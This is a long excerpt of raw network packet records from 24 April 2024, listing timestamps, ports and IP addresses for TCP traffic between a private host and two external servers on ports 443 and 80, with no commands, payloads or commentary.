                                                                                  Apr 24, 2024 06:54:14.911942005 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.911986113 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.911990881 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.912007093 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.912878990 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.912893057 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.912939072 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.912942886 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.912955999 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.913774967 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.913789034 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.913837910 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.913842916 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.914819956 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.914833069 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.914884090 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.914889097 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.915775061 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.915788889 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.915836096 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.915839911 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.916538000 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.916552067 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.916601896 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.916606903 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.917536020 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.917550087 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.917594910 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.917599916 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.917613029 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.918339968 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.918354988 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.918416023 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.918421030 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.919363022 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.919384003 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.919418097 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.919423103 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.919450998 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.920243979 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.920258999 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.920300961 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.920305967 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.920315027 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.921102047 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.921116114 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.921166897 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.921173096 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.921189070 CEST44349732104.21.45.138192.168.2.4
                                                                                  Apr 24, 2024 06:54:14.921211004 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.921235085 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:14.923362017 CEST49732443192.168.2.4104.21.45.138
                                                                                  Apr 24, 2024 06:54:17.214482069 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.374345064 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.374429941 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.374543905 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.539608955 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.539632082 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.539695978 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.539724112 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.539736986 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.539926052 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.540029049 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.540096045 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.540142059 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.540160894 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.540214062 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.540245056 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.540256977 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.540311098 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.540353060 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.699448109 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.699471951 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.699517965 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.699527979 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.699615002 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.699656010 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.699717045 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.699894905 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.699909925 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.699938059 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.699974060 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700016022 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.700047016 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700165033 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700208902 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.700251102 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700289011 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700336933 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.700344086 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700392008 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700433016 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.700434923 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700479031 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700520992 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.700525999 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700620890 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700664997 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.700721025 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700820923 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.700860977 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.859406948 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859435081 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859452963 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859467030 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859479904 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859493971 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859529972 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.859560966 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.859615088 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859678030 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859719992 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.859733105 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859806061 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859847069 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.859859943 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859920025 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.859960079 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.859973907 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860083103 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860131979 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.860163927 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860209942 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860250950 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.860321045 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860436916 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860476971 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.860491037 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860593081 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860632896 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.860678911 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860693932 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860733986 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.860743046 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860800982 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860843897 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.860852003 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860897064 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860924959 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.860937119 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.860968113 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861007929 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.861057997 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861126900 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861141920 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861170053 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.861186028 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861234903 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.861251116 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861299038 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861341000 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.861381054 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861439943 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861474991 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861481905 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.861620903 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861664057 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:17.861692905 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861706972 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:17.861748934 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.019493103 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.019521952 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.019594908 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.019711018 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.019963980 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020015001 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.020159960 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020226955 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020258904 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020270109 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.020359993 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020401955 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.020423889 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020493984 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020509005 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020534992 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.020610094 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020642042 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020651102 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.020659924 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020698071 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.020730019 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020788908 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020829916 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.020836115 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020894051 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020910025 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.020935059 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.020983934 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021022081 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.021073103 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021109104 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021146059 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.021166086 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021210909 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021253109 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.021262884 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021348000 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021388054 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.021405935 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021439075 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021477938 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.021512985 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021553993 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021591902 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021594048 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.021655083 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021701097 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.021712065 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021815062 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021853924 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021856070 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.021917105 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021941900 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.021956921 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.021991014 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022033930 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.022046089 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022135019 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022176981 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.022207022 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022316933 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022331953 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022356987 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.022403002 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022453070 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022450924 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.022598028 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022624016 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022638083 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.022722960 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022764921 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.022767067 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022830963 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022870064 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.022903919 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022917986 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.022953987 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.022974014 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023036957 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023077011 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.023085117 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023099899 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023133993 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.023219109 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023233891 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023261070 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.023302078 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023345947 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023386002 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.023395061 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023432970 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023473024 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.023504019 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023556948 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023597002 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.023610115 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023662090 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023701906 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.023705006 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023781061 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023819923 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.023863077 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.023971081 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024012089 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.024032116 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024058104 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024096012 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.024157047 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024185896 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024226904 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.024226904 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024276972 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024316072 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.024323940 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024394989 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024435043 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.024447918 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024492979 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.024533033 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.179327965 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.179361105 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.179378033 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.179392099 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.179421902 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.179488897 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.179518938 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.179563046 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.179749012 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.179810047 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.179851055 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.179888964 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.179966927 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180003881 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.180046082 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180090904 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180128098 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.180147886 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180176973 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180216074 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.180263996 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180310965 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180349112 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.180350065 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180455923 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180495024 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.180499077 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180542946 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180577993 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.180598974 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180641890 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180711031 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.180733919 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180802107 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180856943 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.180891037 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.180977106 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.181026936 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.181036949 CEST4973380192.168.2.4192.3.243.154
